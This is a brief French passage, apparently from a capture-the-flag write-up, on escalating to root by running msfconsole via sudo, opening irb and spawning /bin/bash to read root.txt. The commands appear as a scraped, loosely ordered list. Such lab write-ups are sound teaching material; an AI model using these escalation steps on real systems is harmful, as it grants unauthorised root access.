On vérifie les permissions sudo :
sudo
sudo -l
On découvre que nous pouvons exécuter Metasploit en tant que root :
Metasploit
root
Dans msfconsole, nous ouvrons une shell Ruby interactive :
msfconsole
Puis nous exécutons un shell Bash :
Nous sommes maintenant root et pouvons lire le flag root.txt ! 🎉
root.txt
Mis à jour il y a 11 mois
sudo /opt/metasploit-framework-6.0.9/msfconsole
irb
system("/bin/bash")
